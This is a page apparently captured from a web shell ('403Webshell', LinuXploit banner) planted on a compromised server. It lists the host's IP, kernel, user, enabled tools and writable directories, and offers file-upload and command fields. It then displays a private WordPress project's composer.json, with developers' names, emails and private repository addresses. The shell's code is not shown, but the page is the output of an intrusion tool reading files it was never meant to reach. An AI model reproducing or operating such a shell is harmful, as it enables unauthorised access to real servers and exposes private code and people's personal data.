403Webshell
Server IP : 164.138.27.172  /  Your IP : 216.73.216.143
Web Server : nginx/1.27.4
System : Linux cookingdream 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : www-adm ( 1001)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/jonasn/dev/internetstiftelsen.se/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/jonasn/dev/internetstiftelsen.se/composer.json
{
    "name": "iis/internetstiftelsen",
    "type": "wordpress-core",
    "version": "0.1",
    "description": "Internetstiftelsen",
    "authors": [
        {
            "name": "Jonas Nordström",
            "email": "jonas.nordstrom@internetstiftelsen.se"
        },
        {
            "name": "Richard Brattlund",
            "email": "richard.brattlund@internetstiftelsen.se"
        },
        {
            "name": "Robert Hedman",
            "email": "robert.hedman@internetstiftelsen.se"
        },
        {
            "name": "Tobias Bleckert",
            "email": "tobias.bleckert@internetstiftelsen.se"
        }
    ],
    "repositories":[
        {
            "type":"composer",
            "url":"https://wpackagist.org"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-pack.git"
        },
        {
          "type": "git",
          "url": "git@github.com:sewebb/iis-podcast.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-page-widgets.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-shortcuts.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-related-posts.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-atf.git"
        },
        {
            "type": "git",
            "url": "git@github.com:westonruter/code-syntax-block.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/manjo-media-replace.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-mailchimp.git"
        },
        {
            "type": "git",
            "url": "git@github.com:sewebb/iis-mailman.git"
        },
        {
            "type": "vcs",
            "url": "git@github.com:sewebb/graphtool-block.git"
        },
        {
            "type": "composer",
            "url": "https://wp-languages.github.io"
        },
        {
            "type": "package",
            "package": {
                "name": "advanced-custom-fields/advanced-custom-fields-pro",
                "version": "5.9.5",
                "type": "wordpress-plugin",
                "dist": {
                    "type": "zip",
                    "url": "https://connect.advancedcustomfields.com/index.php?a=download&p=pro&k={%ACF_PRO_KEY}&t={%VERSION}"
                },
                "require": {
                    "composer/installers": "^1.4",
                    "ffraenz/private-composer-installer": "^5.0"
                }
            }
        }
    ],
    "require": {
        "php": "^7.3",
        "vlucas/phpdotenv": "^4.1",
        "johnpbloch/wordpress": "5.7.2",
        "oscarotero/env":"^1.2.0",
        "iis/iis-pack": "v2.x-dev as 2.0.1",
        "iis/iis-atf": "dev-master",
		"iis/graphtool-block": "^0.12.1",
        "iis/iis-related-posts": "dev-master",
        "westonruter/syntax-highlighting-code-block": "*",
        "koodimonni-language/core-sv_se": "*",
        "wpackagist-plugin/wp-retina-2x": "*",
        "wpackagist-plugin/bugsnag": "^1.3",
        "wpackagist-plugin/simple-page-ordering":"^2.3",
        "wpackagist-plugin/wp-fail2ban":"*",
        "wpackagist-plugin/cache-control":"^2.2",
        "wpackagist-plugin/cms-tree-page-view":"~1.6",
        "wpackagist-plugin/wordpress-seo": "^16.0",
        "wpackagist-plugin/wp-mail-smtp": "^2.6",
        "advanced-custom-fields/advanced-custom-fields-pro": "*",
        "google/recaptcha": "^1.2",
        "iis/manjo-media-replace": "dev-master",
        "gree/jose": "^2.2",
        "firebase/php-jwt": "^5.0",
        "phpseclib/phpseclib": "^2.0",
        "iis/library": "^1.11",
        "iis/blocks": "^5.8",
        "iis/iis-mailchimp": "dev-master",
        "iis/iis-mailman": "dev-master",
        "iis/podcast": "^0.5.0",
        "brainmaestro/composer-git-hooks": "^2.8"
    },
    "autoload": {
        "classmap": [
            "www/app/themes/internetstiftelsen/inc/"
        ]
    },
    "extra": {
        "wordpress-install-dir": "www/wp",
        "installer-paths": {
            "www/app/mu-plugins/{$name}/": ["type:wordpress-muplugin"],
            "www/app/plugins/{$name}/": ["type:wordpress-plugin"],
            "www/app/themes/{$name}/": ["type:wordpress-theme"]
        },
        "dropin-paths": {
            "www/app/languages/": ["vendor:koodimonni-language"],
            "www/app/languages/plugins/": ["vendor:koodimonni-plugin-language"],
            "www/app/languages/themes/": ["vendor:koodimonni-theme-language"]
        },
        "private-composer-installer": {
          "dotenv-path": ".",
          "dotenv-name": ".env"
        },
        "hooks": {
            "pre-commit": [
                "if git diff --cached --name-only --diff-filter=ACM | xargs grep -H -n -E '^(<|>|=|\\|){7}' > /dev/null; then",
                  "echo \"Warning: You have left some Git conflict markers in.\"",
                  "echo \"Your commit is probably bad.\"",
                  "echo",
                  "git diff --cached --name-only --diff-filter=ACM | xargs grep -H -n -E '^(<|>|=|\\|){7}'",
                  "exit 1",
                "fi"
            ]
        }
    },
    "require-dev": {
        "wpackagist-plugin/query-monitor": "*",
        "wpackagist-plugin/debug-bar-console": "*",
        "wpackagist-plugin/rewrite-rules-inspector": "*",
        "squizlabs/php_codesniffer": "3.*",
        "dealerdirect/phpcodesniffer-composer-installer": "^0.7.1",
        "wp-coding-standards/wpcs": "^1.1",
        "deployer/deployer": "^6.3",
        "deployer/recipes": "^6.2",
        "larapack/dd": "1.*"
    },
    "scripts": {
        "test": "./vendor/bin/phpcs -p --standard=wordpress-rules.xml --extensions=php ./www/app/themes/internetstiftelsen",
        "php-fix": "./vendor/bin/phpcbf -p --standard=wordpress-rules.xml --extensions=php ./www/app/themes/internetstiftelsen",
        "php-blame": "./vendor/bin/phpcs -p --standard=wordpress-rules.xml --report=gitblame --extensions=php ./www/app/themes/internetstiftelsen",
        "deploy": "./vendor/bin/dep deploy stage",
        "deploy:stage": "composer deploy",
        "deploy:prod": "./vendor/bin/dep deploy prod",
        "cghooks": "vendor/bin/cghooks",
        "post-install-cmd": "cghooks add --ignore-lock",
        "post-update-cmd": "cghooks update"
    },
    "prefer-stable": true,
    "minimum-stability": "dev"
}

Youez - 2016 - github.com/yon3zu
LinuXploit